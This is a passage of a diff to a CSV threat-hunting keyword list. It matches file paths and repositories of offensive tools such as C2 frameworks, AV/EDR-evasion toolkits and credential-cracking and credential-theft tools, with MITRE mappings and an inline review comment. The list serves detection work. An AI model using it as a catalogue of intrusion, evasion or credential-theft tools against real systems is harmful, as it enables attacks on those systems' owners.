to reset. 
or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","5","468","84","2023-03-21T15:59:54Z","2021-11-16T22:59:04Z" -"*/OJ/gobuster*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*/omg-payloads.git*","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*/OJ/gobuster*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/omg-payloads.git*","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "*/omp2-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/omp2-enum-targets.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/omron-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
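Review bot: The added NetExec row for `"*/ntlmv1.py*"` reuses a keyword that the unchanged exegol row directly above it already defines, and the two rows disagree on `metadata_enable_proxy_detection` (`"0"` for exegol, `"1"` for NetExec). A consumer that indexes on the `keyword` column will keep only one of them, so the effective flag and tool attribution depend on read order. Either align the flag on both rows or record the overlap in `metadata_comment`, for example `"keyword shared with the exegol entry"`, so rule generators can de-duplicate deliberately. The new `"*/ntdsutil.py*"` row, like `"*/ntlmv1.py*"`, matches on a bare file name with `metadata_comment` left at `"N/A"`; a short false-positive note there, as some rows in this data set already carry, would help whoever tunes the resulting detections. The NetExec rows also list `T1069 - T1021 - T1136 - T1018` under the category `Credential Access`; if the ntdsutil module dumps NTDS data, which the name suggests but the row does not show, `T1003.003` would be the closer mapping.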
@@ -4589,32 +4632,32 @@ "*/oneliner2.tpl*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*/onesixtyone/dict.txt*","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","5","416","86","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" "*/onex.git*","offensive_tool_keyword","onex","Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/onex","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/open_vas.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/open_vas.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/openbullet.git*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" -"*/OpenBullet2.git*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","424","2023-09-25T22:57:36Z","2020-04-23T14:04:16Z" +"*/OpenBullet2.git*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" "*/openflow-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/openlookup-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/openvas-otp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/openwebnet-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/opt/.exegol_aliases*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*/opt/chimera*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" 
+"*/opt/chimera*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*/opt/cobaltstrike/logs*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" -"*/opt/Covenant/Covenant/*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*/opt/gocrack/files/engine*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" -"*/opt/gocrack/files/task*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/opt/Covenant/Covenant/*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - 
T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/opt/gocrack/files/engine*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/opt/gocrack/files/task*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" "*/opt/icebreaker*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/opt/implant/*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" -"*/opt/lwp-scripts*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*/opt/lwp-wordlists*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*/opt/merlin/*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*/opt/lwp-scripts*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active 
Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/opt/lwp-wordlists*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/opt/merlin/*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" "*/opt/nessus/*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*/opt/Ninja/*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/opt/Password_Cracking/*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - 
TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" -"*/opt/PoshC2*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/opt/PoshC2*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*/opt/rai/*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 
- T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/opt/seclists/Discovery/*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/optiv/Dent/*","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 
- T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","1","N/A","10","10","296","51","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" -"*/optiv/Freeze/*","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1333","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" +"*/optiv/Freeze/*","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1334","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" "*/oracle-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/oracle-brute-stealth.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/oracle-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -4622,10 +4665,10 @@ "*/oracle-tns-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/orbitaldump.git*","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" "*/oscp.profile*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*/osmedeus*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/osmedeus*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" "*/out:spacerunner.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*/outfile:C:\ProgramData\hashes.txt*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
